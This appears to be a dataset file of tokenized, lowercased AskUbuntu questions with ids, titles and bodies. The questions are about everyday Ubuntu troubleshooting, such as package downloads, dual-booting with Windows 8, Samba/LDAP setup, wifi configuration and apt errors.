382134	both software center and synaptic package manager wo n't download packages	i am running ubuntu 13.10 on a toshiba satellite laptop . i am trying to download labyrinth mind-mapping tool . however , neither the software center nor the synaptic package manager will download anything . i can download the tar.gz but i want to install from the repositories ( i 've had some issues with organization with tar.gz 's in the past ) . there is no error message when using either . once i click `` install '' ( or in the case of synaptic package manager `` apply '' ) the downloading screen appears and just sits at `` 0 bytes of 98.4mb '' forever . i tried with other programs and all are the same . nothing downloads . after 10 or so minutes i can cancel the download just fine with no error messages . the computer works fine while trying to download . i tried running a bunch of other programs to see if i had any cpu speed loss or freezing and i did n't . the system load indicator does n't show a spike in cpu usage either . this is also not a problem with my internet speed or network because i tried downloading large video files from online ( using google chrome ) and they downloaded just fine . ubuntu one is backing up my files instantaneously , and both my dropbox and my insync are working like lightning . my ping is at 64 , my downloading speed is about 34mbps , and my upload speed is at 3.3mbps . here are the speedtest results : http : //www.speedtest.net/my-result/3125146580 again , it is n't giving any error messages so i do n't know what else to say . any help correcting the problem would be awesome . i am sure there is a command i could put into the terminal to install the repository but what i would really like is to repair whatever is broken with both software center and synaptic package manager . thanks so much for any help .
382139	treat ssh terminal like it is local ?	i 'm trying to work on a computer remotely , but some of what i want to do involves calling gui programs . i want them to open on the physical display of the remote laptop . essentially my question is how can i ssh into machine and open firefox or nautilus . whenever i try commands i get server @ hyrule : ~ $ gnome-terminal failed to parse arguments : can not open display : server @ hyrule : ~ $ firefox error : no display specified server @ hyrule : ~ $ nautilus could not parse arguments : can not open display : server @ hyrule : ~ $ i just want the session to be treated like its local .
382144	cd/dvd drive not working 13.04	cd/dvd drive is not working . non of the all fixes from here work for me . devices menu does not contain a cd/dvd drive . few days ago it worked just fine .
382145	my asus zenbook prime ux31a turns up its fans every minute or so on ubuntu 13.10 , even when just browsing . how can i fix that ?	not sure if this was the case with 13.04 as well but i 've only noticed it since a week ago or so . the fans are n't terribly loud and when i have my headphones on i do n't even notice but it 's really weird and ca n't possibly be right like that . every minute or so ( sometimes more frequently ) the fans turn up for around 10-15 seconds or so and then off again . without me doing anything that would require that . any idea what to do ?
382148	can you open a terminal while ubuntu is installing ?	can you open a terminal while ubuntu is installing ? i remember in the old days when i could install linux and hit like f-12 or something and see the installation log and in the really old days of debian i could hit f1 , f2 , etc and get different terminals while the install was occurring . is this possible in ubuntu ?
382152	add group permission to run chmod command on group owned files	i 've been searching for about an hour now and all google ever returns are hits for how to use chmod . i want to be able to grant users that are part of a unix group permission to run chmod on files that are owned by that same group . is this possible ? currently i get permission denied . if i have the following file : -rw-rwxr -- 1 root tunegroup 5100 nov 5 23:36 index.html and as a user that 's a member of tunegroup i run : chmod g-x index.html i get this as the output : chmod : changing permissions of âindex.htmlâ : operation not permitted users wo n't be able to use sudo since they are n't super users , i just want them to have chmod permission on files that they are group owners of and this seems like a logical ability , but i ca n't find how to add this permission anywhere ...
382154	what would happen if i deleted the ubuntu partition from osx ?	what would happen if i delete the ubuntu partitions from apple 's disk utility ? i read that the bootloader would stay on the drive and i would n't be able to delete it any more or something like that . what are the disadvantages of using disk utility instead of the live usb ?
382156	skype does n't launch	when i installed skype that week , skype worked great only that you could n't launch it twice during a session , if i closed skype , to re-open i had to restart my computer , after a few days skype blacked out at random moment a few day later when i launched skype it told me not enough space or something similar , now it does n't launch anymore . i 'm on ubuntu 12.04 @ braiam : if i write df -h it telles me : df : `/root/.gvfs ' : permission denied filesystem size used avail use % mounted on /dev/sda1 143g 44g 92g 33 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 772m 940k 771m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 428k 1.9g 1 % /run/shm none 1.9g 38m 1.9g 2 % /tmp/guest-s30red @ braiam2 : if i type what you said it shows me : 19441 ? sl 1:40 /usr/bin/python /usr/bin/software-center /home/victor /downloads/skype-ubuntu-precise_4.2.0.11-1_i386.deb 22560 pts/1 r+ 0:00 grep -- color=auto skype 26980 ? sl 4:35 skype to briaiam 's answer : rm -r ~/.skype ~/.config/skype rm : can not remove /home/victor/.skype ' : no such file or directory rm : can not remove /home/victor/.config/skype ' : no such file or directory to braiam 's answer ( purge ) : the 2 first lines of your code do n't show any error but the last one does , it will show me : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package skype
382157	data transfer from xp to ubuntu	when one installs ubuntu , is all the xp data ( programs , document files , favourites , etc.. ) transferred to ubuntu as well ? if not , what is the suggested process ?
382158	customize xfce logout-menu	given : working on a computer running xfce 4.10 . to complete the work , i use the `` logout '' menu . objective : to perform some additional command , when you press any button in this menu and , if possible , add my custom button . question 1 : what specifically and exactly happens when you press any of these buttons . where file there write the command shutdown , reboot , etc . question 2 : depending on the state of the system ( distribution , set of packages installed drivers , etc . ) , these buttons are `` gray '' , inactive and therefore not available for use . how do i know where the registered accessibility settings/inaccessibility of these buttons . please forgive my bad english
382159	glx-alternative-nvidia what is it ? do i need to install it sepately	i have a desktop with an nvidia gpu ( a quadro fx 1800 ) . i installed the nvidia gpu driver using sudo apt-get install nvidia-current and i am wondering about a few things : do i need to install glx-alternative-nvidia ? also nvidia-current-updates ? running a dpkg -l , shows that none of the above was automatically installed . i do wonder if i need to install them though . especially about glx-alternative-nvidia i wonder if i 'll juice up some extra opengl power by installing this.. from debian package website it is not clear what this package does , and if i should go ahead and replace mesa with it . thank you for your help
382161	how to shutdown automatically from command line in 13.04	i know there is already a similar question about this topic . but that question was only about how to get the shutdown dialog in general . i need to get back the countdown of the old shutdown dialog ( ubuntu < = 12.10 ) which shutdown the system after 60sec . geobuntu suggested this dbus call in his answer : dbus-send -- print-reply -- dest= '' org.gnome.shell '' /org/gnome/sessionmanager/endsessiondialog org.gnome.sessionmanager.endsessiondialog.open uint32:2 uint32:0 uint32:60 array : objpath : /org/gnome/sessionmanager/endsessiondialog qdbus indicate that third argument is max_wait which should ( in my opinion ) set and start the countdown : ~ $ qdbus org.gnome.shell /org/gnome/sessionmanager/endsessiondialog [ ... ] method void org.gnome.sessionmanager.endsessiondialog.open ( uint type , uint arg_1 , uint max_wait , qlist < qdbusobjectpath > inhibitors ) but it does n't . i already tried various values for type and arg_1 without luck . edit : actually the countdown is more 'nice to have ' . what i really need is that the system will shutdown without any extra user action . it should work without sudo ( including any no-password sudoers ) . i would prefer dbus calls cause i already have a nice list of dbus calls which will shutdown all de 's except unity > = 13.04 edit2 : i had a look into unity source . i do n't know c++ but for me it looks like arg1 and timeout_length are not handled in source ( can someone with c++ knowledge please confirm this ? ) . maybe this will be added in later releases . edit3 : i reported this as bug # 1256703 on launchpad .
382164	my freshly installed 12.04 pc can not see 11.10 pc on network	i just freshly installed 12.04 on a pc . i am trying to connect to another computer in the room running 11.10 . the 11.10 machine shows up in the network portion of the sidebar on the 12.04 box . on the 12.04 box however i can see my macs but not the 11.10 machine . i can see the macs from the 11.10 machine and my macs can see it . what am i doing wrong ? i just want my 11.10 machine to be visible to my 12.04 machine . thanks everybody ! cabalist
382166	copying fils to external storage error	every time i want to copy a file or a folder to an external storage the files size gets a lot less when i see it from the other pc ( ubuntu is not copying all the file ) i 'm using ubuntu 13.10 and every time i copy stuff to my usb when i want to see them on my win 8 laptop the files seems missing if it was a single file it size is much smaller even thought it is taking a long time to copy it from the ubuntu to the usb flash stick and i wait till ubuntu copy bar completely finish copying ( i do n't interrupt it ) i tried to copy files to 3 usb sticks ans 1 external hdd all the same ( missing data ) i 'm so confused it i have n't ever had problems when i used win 7 before i installed ubuntu . note : i 'm using graphical copy i had never user terminal copy *any ideas ? *the problem still even when i run ubuntu without installing it
382168	problem with installing ubuntu 12.04.3 ( windows 8.1 uefi , two disks- ssd and hdd ) on lenovo y580	i have bought a lenovo y580 laptop with an hdd disk . i bought ssd disk too and installed windows 8.1 64bit on it . now i want to install ubuntu 12.04.3 64bit on the hdd disk , but it seems to be impossible . i turned off fast startup and secure boot , but the problem still exists . i tried booting from livecd and pendrive . result is always the same . ubuntu installer dos n't start . could anybody help me to solve the problem ?
382170	how to tell if an app is going to get suspended from qml	i 'm developing a game for ubuntu touch that needs to go in a `` pause '' state when the user goes away from the app to another . how do i get this . i tried to see if the visibility of the mainview changes , but it does n't . could n't find it in the cookbook nor in the api .
382173	can not install 13.10 on an acer c5-123 noitebook	when i try to run ubuntu from the usb stick i get the welcome screen but it does n't boot . in trying other distributions , the same thing happens . seems to be an xorg issue . i am a relative newbie , so please be gentle . the acer c5-123 has an amd e-1 1200 apu which has a radion 8210 onboard . please help me . is there a simple way to install ubuntu on this machine . is there another distro that may work out of the box ? thanks
382177	ubuntu 13.10 installer ( alongside windows 8 ) and gpt partition	i found several answers regarding that issue but i 'd still like to get some confirmation on how to behave in this situation . i bought a quite recent laptop with a pre-installed windows 8 on a 128gb ssd primary hard-drive . as i use it as a working gear , i need to install ubuntu on it . while launching the ubuntu installer from a usb flash drive ( after deactivating the quick start , the graphic acceleration etc . in the bios ) a finally get there but another problem showed up as ubuntu installer does not detect my windows 8 partition . the `` other option '' can be selected but i 'd rather not as i do not want to break my windows 8 partition ( and i saw several posts on forums where the grub-repair or boot-repair or magic-boot-repair ) failed . it clearly seems related to the gpt partition aspect . because of the gpt partition on my primary hard drive ( where windows 8 is installed ) , ubuntu installer fails to detect windows 8 . the only solution i found for now appears to be the removal of the gpt partition ( using fixparts or gdisk ) . my problem is the following : if i do delete the gpt partition , will my windows 8 partition remain intact and be able to boot ( since apparently the different bios can or can not handle disk with or without gpt partition ) i want to install ubuntu on my other hard drive ( which is a 1tb classic hard drive ) and let the primary hard drive only for windows 8 ( which is a 128gb ssd hard drive ) so do i need to do so or should i just install ubuntu by making my own partitions manually and then restore grub ( using boot-repair for example ) to go back to the classical dual-boot menu ? a long story short , the option i 'd like to take is the `` install ubuntu alongside windows 8 '' and no more questions asked and get everything working/launching without restoring or modifying the mbr or moving it to another hard-drive to preserve my neat and working windows partition but i am not sure this is actually possible . sorry for the long post and thank you in advance .
382182	software updater checks for updates and then crashes	after it crashes it shows an error message that says : failed to load the package list this is a serious problem . try again later . if this problem appears again , please report an error to the developers . e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_quantal_restricted_i18n_translation-en % % 5fus , e : the package lists or status file could not be parsed or opened .
382183	tap to click does n't work with mouse in ubuntu 13.10	i have asus ux301 with ubuntu 13.10 . `` tap to click '' option work with laptop touchpad but not with logitech t630 or apple apple magic mouse . i found this this question ( tap-to-click not working in ubuntu 12.04 ) but i do n't have xorg.conf file . so any help to configure `` tap-to-click '' in logitech t630 ? thanks in advance !
382184	how can i restore the time and date to the panel ?	after upgrading to saucy salamander which i think is v 13.10 my date and time usually disappears after boot up . i have seen some solutions on older questions one of which is : using the terminal type killall unity-panel-service which works temporarily but problem returns after reboot . i know this question has been asked before so i could add to that discussion however i found that thread confusing . any ideas ? matt
382186	booting with ubuntu cd on windows xp sp2 - says is n't supported	i 'm trying to use a ubuntu 12.4 cd on a dell latitude d600 , windows xp sp2 512kb ram msg says `` this kernel requires the following features no present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu . '' i am only trying to boot with the ubuntu cd so i can access a buffalo nas drive to try and get the info off the raid array . my goal is not to isntall the os , just to get the data off . i thought there was a notice stating the need for sp3 , but ca n't locate it now . i am extremely new to linux type products . your assistance would be very helpful . thanks .
382188	issues with league of legends on ubunut 13.10	i am running ubuntu 13.10 switching over from windows 7 and i installed playonlinux to run league of legends . everything with the installation went fine i just have some issues with league of legends . there are a couple bugs i was wondering if they can be fixed or ca n't be fixed . first i noticed when i click on the shop icon on the homepage league of legends crashes . i looked up many forums and saw many answers or so called solutions but none has work for me so i 'm wondering if that is a bug that can be fixed or not . if anyone has a solution or answer ? second i noticed while in game some item icons in the shop are a red box , can that be fixed ? third the most important one to me is the lighting while in game is so dark ( still playable ) it makes it an annoyance to play in . is there a solution to fix that as well ?
382189	ca n't resolve local hosts	to start with , my linux or networking knowledge is fairly basic , so it 's probably best to assume that i know nothing . i 've been trying ( for my own furtherance ) to put together some sort of home server , using ubuntu server 12.04 . i have so far got a dhcp and dns server , and it can lease ip addresses and resolve internet domain names , but i can not ( almost certainly due to my own incompetence ) resolve the hostnames of local machines . here is resolv.conf : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 and here , dhcpd.conf : # option definitions common to all supported networks ... option domain-name `` example.org '' ; option domain-name-servers ns1.example.org , ns2.example.org ; option domain-name `` owen.lan '' ; default-lease-time 600 ; max-lease-time 7200 ; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.100 192.168.1.253 ; option routers 192.168.1.254 ; option broadcast-address 192.168.1.255 ; option domain-name-servers 192.168.1.10 ; option ntp-servers 192.168.1.10 ; option netbios-name-servers 192.168.1.10 ; option netbios-node-type 8 ; } lastly , the hostfile for the server : 127.0.0.1 localhost 127.0.1.1 main-server.home main-server # the following lines are desirable for ipv6 capable hosts < /code > : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters what ( probably obvious ) point am i missing ?
382191	how do you avoid experincing the black screen error when updating to 12.10	a while ago i was updating my 12.04 to 12.10 and i got the black screen of death . ( thank god it was n't a blue screen of death . : p ) after hours of trying to fix it , i end up reinstalling 12.04 again . is it possible to fix this error before i update to 12.10 ? thanks ! edit : i have a intel速 945g x86/mmx/sse2 graphics card . edit more : i eventually just installed 14.04 and there was no such problem .
382195	why does my computer show multiple terminals open ubuntu 13.10	i am running a c program that records the number of terminals open and then lists them but when i run it i am shown multiple terminal windows open when only the one is , why ?
382196	how can i delete a partition ?	after a problem upgrading to 13.10 we had to create a partition which appears as device labelled 115 gb volume . when opened in the files window it 's name in the tab is a lot of numbers and letters . i would like to delete the partition safely . is there anything i should check first and how do i delete it ?
382197	can not connect ubuntu shared files with windows homegroup	i installed ubuntu 13.10 . i can not connect shared files to other windows 8 pcs . i checked that everything is ok on the windows side and i installed samba on the ubuntu side . what should i do to see the windows pcs on the ubuntu pc ?
382202	how do i make transmission to start automatically when i open my computer ?	my system runs on ubuntu 12.04 and i use the transmission bit-torrent client which was on it . it works just fine but i would like it to open as soon as i get on the system instead of having to open it . it 's not a big problem but if i forget it the torrents are not being downloaded . thank in advance if anyone can help .
382209	what are all of the apps banshee uses to transfer music to an ipod ?	what are the names of all the apps banshee uses to copy music to an ipod ? i have gtkpod ; i just want to do some investigation of my own with these and see if i can figure out why i ca n't copy music to my 5th generation ipod nano ( black ) . i typed gtkpod in terminal and it said that gtkpod is not installed .
382216	switching windows - type name of window	in emacs it is possible to switch buffers by typing ctrl-x b and you can start typing the name of another buffer , and as you type you can auto-complete the name of buffers which match what you have typed . in windows there is a script for autohotkeys called iswitchw which emulates the behaviour of emacs but instead of switching between the buffers in emacs , it allows you to switch between windows ( based on the title of the window ) . is there any similar tool which allows the user to switch between windows in ubuntu/unity ?
382218	how to connect win-7 with samba to server	i have setup a work server using ubuntu 12.04 and am trying to get my win-7 pc to connect to the new domain . i have created multiple users in ldap and assigned them to the groups `` domainadmins '' and `` domainusers '' . when i try to connect to the server with the username i receive the following error : https : //docs.zoho.com/file/gu1wafc6f49e140d4416d91f54225258467e5 i looked up this error and found that this can be fixed by entering the below command : sudo net sam rights grant < user > semachineaccountprivilege when i enter this into the terminal i receive the following message : could not find name < user > i installed lam so i could see the users on a gui and they are setup . additional information i 'm not sure if this is all related but i thought it would help ldap account manager : there are users and groups setup but there is no `` hosts '' or `` samba domains '' when adding a user through lam i go to the samba 3 tab and click `` add samba 3 extension '' but it errors saying `` no samba 3 domains found in ldap . please create one first '' unforunately i ca n't create one because i ca n't fetch the local sid ( see below for error ) . schema test in lam users samba 3 the object class sambasamaccount is not supported by your ldap server . groups samba 3 the object class sambagroupmapping is not supported by your ldap server . hosts samba 3 the object class sambasamaccount is not supported by your ldap server . samba domains samba domain the object class sambadomain is not supported by your ldap server . samba client information from command smbclient -l ubb01 domain= [ example.com ] os= [ unix ] server= [ samba 3.6.3 ] sharename type comment -- -- -- -- - -- -- -- -- -- - netlogon disk network logon service print $ disk printer drivers ipc $ ipc ipc service ( ubb01 server ( samba , ubuntu ) ) chiserver disk home directories domain= [ example.com ] os= [ unix ] server= [ samba 3.6.3 ] server comment -- -- -- -- - -- -- -- - ubb01 ubb01 server ( samba , ubuntu ) workgroup master -- -- -- -- - -- -- -- - chiserver.com ubb01 workgroup chiheads-101 ( domain names are n't actually set as `` example.com '' ) chiserver @ ubb01 : ~ $ testparm load smb config files from /etc/samba/smb.conf rlimit_max : increasing rlimit_max ( 1024 ) to minimum windows limit ( 16384 ) processing section `` [ homes ] '' processing section `` [ netlogon ] '' warning : the `` share modes '' option is deprecated processing section `` [ printers ] '' processing section `` [ print $ ] '' loaded services file ok. server role : role_domain_pdc press enter to see a dump of your service definitions [ global ] workgroup = example.com realm = example.com server string = % h server ( samba , ubuntu ) map to guest = bad user obey pam restrictions = yes pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes client ntlmv2 auth = no client lanman auth = yes kerberos method = system keytab syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u logon script = logon.cmd logon path = \\ % n\ % u\windowsprofile logon drive = h : domain logons = yes dns proxy = no usershare allow guests = yes panic action = /usr/share/samba/panic-action % d idmap config * : backend = tdb [ homes ] comment = home directories valid users = % s read only = no browseable = no [ netlogon ] comment = network logon service path = /home/samba/netlogon guest ok = yes share modes = no [ printers ] comment = all printers path = /var/spool/samba create mask = 0700 printable = yes print ok = yes browseable = no [ print $ ] comment = printer drivers path = /var/lib/samba/printers ca n't get local sid while trying to retrieve the localsid i receive an error : net getlocalsid failed to open /var/lib/samba/secrets.tdb unable to open secrets.tdb . ca n't fetch domain sid for name : ubb01 users not showing at login i only have 1 user showing at the login screen of ubuntu ( the user setup during installation ) . i presume this is because it looks like the other users are only setup in ldap . when trying to login from win-7 with the original user i receive a different error message ... ( this user i was able to give semachineaccountprivilege ) the specified computer account could not be found . contact an administrator to verify the account is in the domain . if the account has been deleted unjoin , reboot and rejoin the domain . guide to setup server i have been following this danbishop.org guide to setup this box . note : i have n't completed the section in step 8 to recognise unix admins as windows admins as i am also having issues with this ... sudo net groupmap add ntgroup= '' domain admins '' unixgroup=domainadmins rid=512 type=d so how to solve this issue ?
382220	how to change the default volume name ?	i am using ubuntu 13.10 . when i mount the logical volume through unity dash or the file manager it creates the mount point at /media/ $ user/557808d2-b3a5-4bf2-b84b-93a3b42ce36a . i want to change the volume label from 557808d2-b3a5-4bf2-b84b-93a3b42ce36a to some simple string like 'data ' and keep it as it is permanently , so that it wont change next time when i mount it . how do i do that ?
382223	i cant boot ubuntu desktop 13.10 on windows 8.1	i have a toshiba satellite l755d , im running windows 8.1 on it right now with no problems . i have downloaded the international live usb installer and added ubuntu 13.10 to a 4 gb usb . heres the deal , when im trying to reboot the computer , i select the option that says usb , however it will still take me to windows 8.1 and i never get to go to grub screen where you can start installation . im trying to do a dual install . i dont have secure boot if youre wondering , i checked that out on the powershell so i dont know what else to do . i really want to start using ubuntu but i just dont want to loose windows , im a noob i must add so please be gente lol .
382226	laptop suspends when switching to f1-f6 terminals ; lid closed , external monitor	as the title says , the laptop automatically suspends without my telling it to do so when i switch from x ( gnome-shell 3.10 ) to the f terminals . the power settings are set to never suspend , and the gnome settings are set to never suspend . this just recently changed -- very annoying .
382227	unable to install madwifi	i installed ubuntu 12.04 last night after completely formatting the hdd . now , i ca n't get any wifi or ethernet connection . i have downloaded madwifi on another computer and transfered it over to my laptop but when i try and install it , i get an error that says `` unable to find package '' i ca n't update anything or use synaptic package manager . any help is appreciated . the laptop is a toshiba satellite l50-a
382229	ubuntu will not update from 13.04 to 13.10	i 've tried both terminal and software updater . according to terminal i have no update . i will click on software updater and it will show that an update to 13.10 is available , but after i click upgrade and enter my credentials the window will simply close and no subsequent window will pop up . i 've never had this issue before . i 've restarted multiple times and it 's still the same issue . anybody else having this problem ? if so has anybody figured out a fix ? any help is appreciated . i 've checked the software and update settings . everything seemed okay . restored defaults but the problem persisted . again , any help is appreciated . ( :
382232	when trying to install shiny server for r , the command in the setup instructions triggers a bash syntax error , how do i fix it ?	so i 'm trying to install shiny server for the r programming language on ubuntu 12.04 , using the information available at this page on the program 's github . however , when i get to this step : # install shiny in system-wide library sudo su - -c `` r -e \\ '' install.packages ( 'shiny ' , repos='http : //cran.rstudio.com/ ' ) \\ '' '' i get the following : bash : syntax error near unexpected token ` ( '
382236	gparted bricked my usb drive	i tried to use gparted to rename my usb drive . everything appeared to run smoothly , but when i removed the drive and reinserted it , it would n't mount . i can see the usb initialisation in dmesg , and see the drive in lsusb ; however nothing shows up fdisk , ls /dev/ or gparted . is there anything i can do to bring this drive back to life ?
382238	does ubuntu 12.04 lts runs on my computer ? i need help	i 'm learning on my school about operating system 's installation , ubuntu looks so beauty and fast , even on that old computers . i have an emachines l4030 , originally with windows xp starter edition , later i upgraded it to windows xp professional sp3 . here is my system hardware : procesador intel celeron d355 3.33ghz,256 kb l2 de cache 533 mhz fsb video intel graphics media accelerator 900 con ranura pc-iexpress disponible hdd 80 gb sata memory 256 mb ddr2 sdram i want to learn about another kind of systems , i do n't want to throw windows to the trash because i still need it for school , i was thinking on a partition ( 20gb for xp- 60gb for ubuntu ) but i do n't know if ubuntu will run as i want to with my hardware i 'm sorry ! i forgot to tell you guys that i upgraded the ram to 1.7gb , i copied the info from internet and i did n't remember the upgrade . can i use ubuntu with that upgrade ?
382239	external hard drive and startup services on boot	i have an external hard drive . if it mounted need to startup services on boot , else do n't . how can i do this ? ubuntu 12.04.3 lts i use fstab , but if hdd did n't plug in then mediatomb and other lost their database because they started . cat /etc/fstab ... # hdd disk on /dev/sdb5 uuid=233c8fed-5bcc-49d6-8653-f185f2226f7e /media/hdd/ ext4 nobootwait , user , defaults 0 0 p.s . : sorry for my bad english
382240	why is minecraft so laggy ?	i recently installed ubuntu ( 32 bit ) on this dell dimesion 2400 . it had windows 7 before . i 'm running minecraft with the java from the ubuntu software center and it can start up perfectly . but the game flickers and disappears . also it 's super laggy ! lowest settings possible . i have 1 gb of ram and the graphics card is intel corporation 82865g integrated graphics controller ( rev 02 ) . i know it is n't good , but before i installed ubuntu , i had minecraft running with 25+ fps . is it possible to fix this ?
382242	after installing windows 8 next to ubuntu , i can only boot 8	i bought a new hp laptop with windows 8 to replace an old laptop running ubuntu . using acronis i cloned the ubuntu installation over to my new laptop ... accidentally overriding the windows installation . no big deal , i thought . it was a new computer and i did n't have anything special on it so i popped a windows 8 disc in the drive , and loaded onto my second partition . now , the computer only boots to windows 8 and i have no idea how to get it boot to ubuntu . i have already turned off the uefi and secure boot options from the bios but i have no idea where to go from here .
382254	13.10 with amd mobility 4200 and hd 6370 hybrid card issue	helo , everybody ! i 'm having a problem with my hybrid card on ubuntu 13.10 . i can´t make them work , i 've already tried a lot of solutions , but it never works ... so , some one knows how to make these graphics cards work correctly on ubuntu 13.10 ? i 've already tried this : https : //wiki.ubuntu.com/x/config/hybridgraphics but the only thing i get is a black screen after booting . so ... i really don´t know what to do ... thanks and sorry for my poor english ! $ sudo lspci -nnk | grep -a5 vga 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rs880m [ mobility radeon hd 4225/4250 ] [ 1002:9712 ] subsystem : hewlett-packard company device [ 103c:1445 ] kernel driver in use : radeon 01:05.1 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] rs880 hdmi audio [ radeon hd 4200 series ] [ 1002:970f ] subsystem : hewlett-packard company device [ 103c:1445 ] kernel driver in use : snd_hda_intel 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] robson ce [ radeon hd 6370m/7370m ] [ 1002:68e4 ] subsystem : hewlett-packard company radeon hd 6370m [ 103c:1445 ] kernel driver in use : radeon 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:1483 ] kernel driver in use : wl i 'm using ubuntu 13.10 .
382255	boot-repair error	hi i have a boot report here . i need to know what settings to turn on . default repair does not work , there is a /boot partition under sda7 , but turning on that setting alone , makes it so the grub shell comes up . i need the boot menu . i have a tri-boot laptop , opensuse , win7 , and fedora 19 .
382256	ping ip or url from different ip with same ubuntu	how to ping a ip or url from different location or ip with same ubuntu pc . i want access same ip or url from the same ubuntu pc but not with same system ip every time . thank you .
382257	unable to do apt-get upgrade or update : not found	when i do sudo apt-get upgrade or update , i get the following : err http : //security.ubuntu.com/ubuntu/ saucy-security/main apport all 2.12.5-0ubuntu2.1 404 not found [ ip : 91.189.91.15 80 ] err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ saucy/main libwhoopsie0 amd64 0.2.24.1 404 not found err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ saucy-updates/main software-properties-common all 0.92.28 404 not found err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ saucy-updates/main python3-software-properties all 0.92.28 404 not found failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/libd/libdrm/libdrm2_2.4.46-1ubuntu1_amd64.deb 404 not found failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/procps/libprocps0_3.3.3-2ubuntu9_amd64.deb 404 not found failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/s/systemd/udev_204-0ubuntu19_amd64.deb 404 not found failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/s/systemd/libudev1_204-0ubuntu19_amd64.deb 404 not found failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/g/geoip/libgeoip1_1.5.1-1ubuntu1_amd64.deb 404 not found i am running the latest ubuntu 13.10in aws . ( the standard ubuntu aim when launch instance ) i thought those errors were from older version of aws.. i do n't know why it appears in the latest ubuntu version . what should i do ?
382262	streaming video on win 8.1 vs firefox on ubuntu 12.04	i have a dual boot system , ubuntu 12.04 and windows 8.1 ; just an experimental spare computer , the point here being that the hardware is identical . when using ie and windows 8.1 , i can view streaming video quite nicely ... task manager shows cpu usage between 20-30 % and the system runs effortlessly . on the other hand , when using ubuntu 12.04 , same site , same video , using firefox , the playback is extremely choppy and cpu hovers between 90 and 100 percent and the system chugs along . why is that ? possibly a driver issue ?
382267	`` no such file or directory '' but it 's there .	i 'm a total newbie to ubuntu and linux and i 'm struggling to even navigate to folders . the below often happens - brian2 @ ubuntu : ~ $ cd /home/ brian2 @ ubuntu : /home $ cd /brian2 bash : cd : /brian2 : no such file or directory brian2 @ ubuntu : /home $ l brian/ brian2/ fslyne/ testuser/ as you can see from the above i 'm trying to go to the folder brian2 but ubuntu tells me no such file or directory but the directory list command tells me it is there .
382272	how do i install the jetspeed maven plugin if .m2 file is read-only ?	i am currently trying to go through the jetspeed portal tutorial . however , once i made it to the `` configure maven build '' section , i ran into a problem . the tutorial asks that in order to setup the jetspeed maven plugin , i edit a file called settings.xml in the .m2 folder . however , i do not have a visible .m2 folder in my home directory . i can point to home/ryan/.m2 in the terminal , but it simply has a repository file ( and , again , this is all unseen within the file explorer ) . i located the settings.xml file and a file called m2.conf in /usr/share/maven/conf directory , but both these files are read-only . additionally , the tutorial says to create a .m2 folder in your home directory if there is n't one present , but when i try to do this , i 'm given an error that such a file already exists . i 'm really at a loss here , and any help would be greatly appreciated .
382273	discard option in crypttab and security problem for encrypted ssd	why enabling the discard option in crypttab is a security risk ? i understand that unused areas will be replaced by zero . and this way , the nsa ; - ) will be able to deduce what part of the hard disk contains something and what part of the hard disk is empty . and also the nsa could deduce the filesystem used . so what ? the data of the hard disk are still encrypted . probably i am missing something important .
382274	lenovo g580 touch pad issue	my lenovo g580 touchpad get hanged in the middle while scrolling through the page and either i have to wait for it or i press tab button to resume the work . i also tried an external usb mouse , but problem remains the same .
382275	automatic wifi startup	i would like to do the following - bring up wlan0 at boot . start wpa_suplicant with the specified command line options once wlan0 is up . run dhclient -nw wlan0 once wpa_supplicant has associated with an access point . right now , i have the following in my /etc/network/interface . iface waln0 inet dhcp metric 10 wpa-conf /etc/wpa_supplicant.conf wpa-driver wext and it does not help at all . also , ifup wlan0 does not seem to work . i have a script called wlan.sh that i use for now . that runs - sudo ifconfig wlan0 up sudo wpa_supplicant -b -dwext -iwlan0 -c/etc/wpa_supplicant.conf sudo dhclient -nw wlan0 i put a script to start wpa_supplicant in /usr/share/dbus-1/system-services/fi.epitest.hostap.wpasupplicant.service , but that does not work . also , since dhclient remain in the background , it seems necessary to not execute it at each association , but it can not be executed before wlan0 comes up . what is going wrong ? what scripts do i have to use to trigger the chain reaction ?
382277	vpn server with windows clients	i have the pptp server up and running on ubuntu just fine , but i have a questions : i set a remote_ip range of 192.168.168.96-127 , but every machine that logs in ( i 've tried four at once ) all gets the ip of .96 . is this correct ?
382282	is there any groups for software development in ubuntu ?	i am really willing to contribute to open-source software development . but the thing is , i am alone . is there any groups in ubuntu where i can share my idea , and i can be a beta-tester , or maybe make programs using ideas ? i am really a new-bie , and i want to help the open-source community and become a member of it .
